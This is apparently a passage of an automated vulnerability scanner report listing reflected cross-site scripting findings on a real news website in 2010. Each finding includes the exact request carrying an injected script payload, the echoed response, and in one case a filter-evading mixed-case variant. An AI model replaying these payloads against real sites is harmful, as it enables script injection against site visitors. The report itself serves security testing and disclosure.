The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 166fb"><script>alert(1)</script>e75361cb0b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker166fb"><script>alert(1)</script>e75361cb0b0/sexybeast/tweet-sheet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker166fb"><script>alert(1)</script>e75361cb0b0/sexybeast/tweet-sheet/"/>
...[SNIP]...

1.75. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d87"><script>alert(1)</script>13c672e9d3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/sexybeast/tweet-sheet69d87"><script>alert(1)</script>13c672e9d3f/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet69d87"><script>alert(1)</script>13c672e9d3f/"/>
...[SNIP]...

1.76. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d60"><script>alert(1)</script>db5a652cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker45d60"><script>alert(1)</script>db5a652cb3/sexybeast/tweet-sheet/dita-von-teese346346/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker45d60"><script>alert(1)</script>db5a652cb3/sexybeast/tweet-sheet/dita-von-teese346346/"/>
...[SNIP]...

1.77. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46586"><script>alert(1)</script>015e296bc77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/sexybeast/tweet-sheet46586"><script>alert(1)</script>015e296bc77/dita-von-teese346346/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet46586"><script>alert(1)</script>015e296bc77/dita-von-teese346346/"/>
...[SNIP]...

1.78. http://www.thedailybeast.com/partnersfeed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /partnersfeed/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd2b"><script>alert(1)</script>676adf887cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partnersfeed6fd2b"><script>alert(1)</script>676adf887cb/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/partnersfeed6fd2b"><script>alert(1)</script>676adf887cb/"/>
...[SNIP]...

1.79. http://www.thedailybeast.com/search/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d7d"><script>alert(1)</script>bc76b884a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search43d7d"><script>alert(1)</script>bc76b884a6e/?cx=017680379443801271591%3As5g4uqjytqs&cof=FORID%3A9%3BNB%3A1&ie=UTF-8&q=%60 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/?cid=blogunit
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:50:58 GMT
Connection: close
Content-Length: 59663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/search43d7d"><script>alert(1)</script>bc76b884a6e/"/>
...[SNIP]...

1.80. http://www.thedailybeast.com/sexybeast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /sexybeast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 421c5"><script>alert(1)</script>5348693c8a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sexybeast421c5"><script>alert(1)</script>5348693c8a2/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/sexybeast/421c5"><script>alert(1)</script>5348693c8a2/"/>
...[SNIP]...

1.81. http://www.thedailybeast.com/tag/50+cent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/50+cent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9004"><script>alert(1)</script>e41d04442a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd9004"><script>alert(1)</script>e41d04442a2/50+cent/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagd9004"><script>alert(1)</script>e41d04442a2/50+cent/"/>
...[SNIP]...

1.82. http://www.thedailybeast.com/tag/america‚??s%20next%20top%20model/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/america...s%20next%20top%20model/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e60"style%3d"x%3aexpression(alert(1))"fd48884a177 was submitted in the REST URL parameter 1. This input was echoed as c0e60"style="x:expression(alert(1))"fd48884a177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tagc0e60"style%3d"x%3aexpression(alert(1))"fd48884a177/america...s%20next%20top%20model/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagc0e60"style="x:expression(alert(1))"fd48884a177/america...s next top model/"/>
...[SNIP]...

1.83. http://www.thedailybeast.com/tag/america‚??s%20next%20top%20model/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/america...s%20next%20top%20model/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73636"><script>alert(1)</script>d39c002ea36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag73636"><script>alert(1)</script>d39c002ea36/america...s%20next%20top%20model/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag73636"><script>alert(1)</script>d39c002ea36/america...s next top model/"/>
...[SNIP]...

1.84. http://www.thedailybeast.com/tag/antoine+dodson/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/antoine+dodson/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4df"><script>alert(1)</script>138242d0c5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag6f4df"><script>alert(1)</script>138242d0c5d/antoine+dodson/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag6f4df"><script>alert(1)</script>138242d0c5d/antoine+dodson/"/>
...[SNIP]...

1.85. http://www.thedailybeast.com/tag/arnold+schwarzenegger/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/arnold+schwarzenegger/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aedfc"><script>alert(1)</script>a102819a1d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagaedfc"><script>alert(1)</script>a102819a1d3/arnold+schwarzenegger/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagaedfc"><script>alert(1)</script>a102819a1d3/arnold+schwarzenegger/"/>
...[SNIP]...

1.86. http://www.thedailybeast.com/tag/chilean+miner+edison+pena/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/chilean+miner+edison+pena/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42388"><script>alert(1)</script>a4168bb80bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag42388"><script>alert(1)</script>a4168bb80bb/chilean+miner+edison+pena/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag42388"><script>alert(1)</script>a4168bb80bb/chilean+miner+edison+pena/"/>
...[SNIP]...

1.87. http://www.thedailybeast.com/tag/christine%20o‚??donnell/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/christine%20o...donnell/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b27"><script>alert(1)</script>1c118ead74b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagb3b27"><script>alert(1)</script>1c118ead74b/christine%20o...donnell/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagb3b27"><script>alert(1)</script>1c118ead74b/christine o...donnell/"/>
...[SNIP]...

1.88. http://www.thedailybeast.com/tag/conan%20o‚??brien/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/conan%20o...brien/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9706"><ScRiPt>alert(1)</ScRiPt>e9a8b0856c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /tagc9706"><ScRiPt>alert(1)</ScRiPt>e9a8b0856c5/conan%20o...brien/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagc9706"><ScRiPt>alert(1)</ScRiPt>e9a8b0856c5/conan o...brien/"/>
...[SNIP]...

1.89. http://www.thedailybeast.com/tag/conan%20o‚??brien/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/conan%20o...brien/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4881"><script>alert(1)</script>240fb908a10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga4881"><script>alert(1)</script>240fb908a10/conan%20o...brien/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga4881"><script>alert(1)</script>240fb908a10/conan o...brien/"/>
...[SNIP]...

1.90. http://www.thedailybeast.com/tag/entertainment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/entertainment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f615c"><script>alert(1)</script>fa176293878 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf615c"><script>alert(1)</script>fa176293878/entertainment/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagf615c"><script>alert(1)</script>fa176293878/entertainment/"/>
...[SNIP]...

1.91. http://www.thedailybeast.com/tag/george+w+bush/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/george+w+bush/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a15ab"><script>alert(1)</script>fe7a665db89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga15ab"><script>alert(1)</script>fe7a665db89/george+w+bush/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga15ab"><script>alert(1)</script>fe7a665db89/george+w+bush/"/>
...[SNIP]...

1.92. http://www.thedailybeast.com/tag/glee/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/glee/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37aa"><script>alert(1)</script>f06f94f8a9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf37aa"><script>alert(1)</script>f06f94f8a9f/glee/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
